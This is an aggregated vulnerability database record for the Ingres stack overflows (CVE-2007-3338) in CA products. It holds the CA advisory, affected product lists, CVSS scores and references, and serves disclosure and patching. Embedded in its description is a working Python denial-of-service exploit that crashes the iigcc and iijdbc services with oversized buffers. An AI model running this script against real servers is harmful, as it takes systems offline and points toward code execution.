ID

VAR-200706-0399


CVE

CVE-2007-3338


TITLE

plural CA Product Ingres database server Vulnerable to stack-based buffer overflow

Trust: 0.8

sources: JVNDB: JVNDB-2007-004029

DESCRIPTION

Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities CA Vuln ID (CAID): 35450, 35451, 35452, 35453 CA Advisory Date: 2007-06-21 Reported By: NGSSoftware, and iDefense Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected. 1) Ingres controllable pointer overwrite vulnerability (reported by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450] Description: An unauthenticated attacker can potentially execute arbitrary code within the context of the database server. 3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user. 4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten. 5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. 6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. 7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022. Mitigating Factors: None Severity: CA has given these vulnerabilities a cumulative High risk rating. Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1 Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms. Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp Workaround: None References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 # Notes: Fixed in the last version. # please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com> import socket import sys if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>" print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3] if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) payload += "\x42" * 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data) print service + " crashed"

Trust: 2.07

sources: NVD: CVE-2007-3338 // JVNDB: JVNDB-2007-004029 // BID: 24585 // PACKETSTORM: 57303 // PACKETSTORM: 92818

AFFECTED PRODUCTS

vendor:ingresmodel:database serverscope:eqversion:r3

Trust: 2.4

vendor:ingresmodel:database serverscope:eqversion:2.6

Trust: 2.4

vendor:ingresmodel:database serverscope:eqversion:2.5

Trust: 1.6

vendor:ingresmodel:database serverscope:eqversion:9.0.4

Trust: 1.6

vendor:ingresmodel:database serverscope:eqversion:2006 9.0.4

Trust: 0.8

vendor:ingresmodel:database serverscope:eqversion:and 2.5

Trust: 0.8

vendor:ingresmodel:databasescope:eqversion:20060

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:3.0.3

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.6

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.5

Trust: 0.3

vendor:computermodel:associates wily soa managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates unicenter workload control center 1.0.sp4scope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter workload control center sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.4.2

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter tng 2.4.2jscope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter software deliveryscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp1scope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp3scope:eqversion:5.5

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.2

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.0.2

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service catalogscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter patch managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.1

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter management portalscope:eqversion:3.1.1

Trust: 0.3

vendor:computermodel:associates unicenter lightweight portalscope:eqversion:2

Trust: 0.3

vendor:computermodel:associates unicenter job management optionscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp3scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter desktop management suitescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter desktop and server managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter database command centerscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.11

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.2.1

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.3

Trust: 0.3

vendor:computermodel:associates unicenter asset managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter asset intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter advanced systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates etrust web access controlscope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates etrust secure content managerscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust network forensicsscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust identity managerscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust iam suitescope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust directoryscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust audit r8scope: - version: -

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust admin sp2scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust admin sp1scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates docserverscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates cleverpath predictive analysis serverscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates cleverpath aion brescope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates cleverpath aion bpmscope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates ccsscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates brightstor storage resource managerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor storage command centerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for tru64scope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for solarisscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for hpscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for aixscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:9.0

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates arcserve backup for laptops and desktopsscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbench sp1scope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates advantage data transformerscope:eqversion:2.2

Trust: 0.3

sources: BID: 24585 // JVNDB: JVNDB-2007-004029 // NVD: CVE-2007-3338 // CNNVD: CNNVD-200706-380

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2007-3338
value: HIGH

Trust: 1.8

CNNVD: CNNVD-200706-380
value: CRITICAL

Trust: 0.6

NVD:
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: FALSE
obtainAllPrivilege: TRUE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: CVE-2007-3338
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

sources: JVNDB: JVNDB-2007-004029 // NVD: CVE-2007-3338 // CNNVD: CNNVD-200706-380

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.8

sources: JVNDB: JVNDB-2007-004029 // NVD: CVE-2007-3338

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200706-380

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200706-380

CONFIGURATIONS

sources: NVD: CVE-2007-3338

PATCH

title:Ingres Security Alerturl:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Trust: 0.8

sources: JVNDB: JVNDB-2007-004029

EXTERNAL IDS

db:NVDid:CVE-2007-3338

Trust: 2.9

db:BIDid:24585

Trust: 1.9

db:VUPENid:ADV-2007-2288

Trust: 1.6

db:VUPENid:ADV-2007-2290

Trust: 1.6

db:SECUNIAid:25756

Trust: 1.6

db:SECUNIAid:25775

Trust: 1.6

db:OSVDBid:37483

Trust: 1.0

db:JVNDBid:JVNDB-2007-004029

Trust: 0.8

db:BUGTRAQid:20070625 INGRES STACK OVERFLOW IN UUID_FROM_CHAR FUNCTION

Trust: 0.6

db:BUGTRAQid:20070625 INGRES VERIFYDB LOCAL STACK OVERFLOW

Trust: 0.6

db:XFid:34998

Trust: 0.6

db:XFid:34995

Trust: 0.6

db:CNNVDid:CNNVD-200706-380

Trust: 0.6

db:PACKETSTORMid:57303

Trust: 0.1

db:PACKETSTORMid:92818

Trust: 0.1

sources: BID: 24585 // JVNDB: JVNDB-2007-004029 // PACKETSTORM: 57303 // PACKETSTORM: 92818 // NVD: CVE-2007-3338 // CNNVD: CNNVD-200706-380

REFERENCES

url:http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778

Trust: 2.0

url:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Trust: 2.0

url:http://secunia.com/advisories/25756

Trust: 1.6

url:http://secunia.com/advisories/25775

Trust: 1.6

url:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/

Trust: 1.6

url:http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/

Trust: 1.6

url:http://www.securityfocus.com/bid/24585

Trust: 1.6

url:http://osvdb.org/37483

Trust: 1.0

url:http://www.securityfocus.com/archive/1/472194/100/0/threaded

Trust: 1.0

url:http://www.securityfocus.com/archive/1/472197/100/0/threaded

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/2288

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/2290

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34995

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34998

Trust: 1.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338

Trust: 0.9

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3338

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/34998

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/34995

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/472197/100/0/threaded

Trust: 0.6

url:http://www.securityfocus.com/archive/1/archive/1/472194/100/0/threaded

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/2290

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/2288

Trust: 0.6

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546

Trust: 0.4

url:http://www.ingres.com/

Trust: 0.3

url:/archive/1/472192

Trust: 0.3

url:/archive/1/471950

Trust: 0.3

url:/archive/1/472197

Trust: 0.3

url:/archive/1/472193

Trust: 0.3

url:/archive/1/472194

Trust: 0.3

url:/archive/1/472200

Trust: 0.3

url:msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com

Trust: 0.3

url:http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2007-3336

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-3334

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-3337

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-3338

Trust: 0.2

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336

Trust: 0.1

url:http://supportconnect.ca.com/

Trust: 0.1

url:http://www.ca.com/us/contact/

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337

Trust: 0.1

url:http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453

Trust: 0.1

url:http://www.ca.com/us/privacy/

Trust: 0.1

url:http://supportconnect.ca.com.

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450

Trust: 0.1

url:http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp

Trust: 0.1

url:http://osvdb.org/

Trust: 0.1

url:http://www.ngssoftware.com/research/advisories/

Trust: 0.1

url:http://www.ca.com/us/legal/

Trust: 0.1

sources: BID: 24585 // JVNDB: JVNDB-2007-004029 // PACKETSTORM: 57303 // PACKETSTORM: 92818 // NVD: CVE-2007-3338 // CNNVD: CNNVD-200706-380

CREDITS

iDEFENSEChris Anley※ chris@ngssoftware.com

Trust: 0.6

sources: CNNVD: CNNVD-200706-380

SOURCES

db:BIDid:24585
db:JVNDBid:JVNDB-2007-004029
db:PACKETSTORMid:57303
db:PACKETSTORMid:92818
db:NVDid:CVE-2007-3338
db:CNNVDid:CNNVD-200706-380

LAST UPDATE DATE

2023-12-18T12:46:47.252000+00:00


SOURCES UPDATE DATE

db:BIDid:24585date:2015-03-19T08:36:00
db:JVNDBid:JVNDB-2007-004029date:2012-09-25T00:00:00
db:NVDid:CVE-2007-3338date:2018-10-16T16:48:28.997
db:CNNVDid:CNNVD-200706-380date:2007-06-25T00:00:00

SOURCES RELEASE DATE

db:BIDid:24585date:2007-06-21T00:00:00
db:JVNDBid:JVNDB-2007-004029date:2012-09-25T00:00:00
db:PACKETSTORMid:57303date:2007-06-26T21:32:27
db:PACKETSTORMid:92818date:2010-08-17T01:35:50
db:NVDid:CVE-2007-3338date:2007-06-22T18:30:00
db:CNNVDid:CNNVD-200706-380date:2007-06-22T00:00:00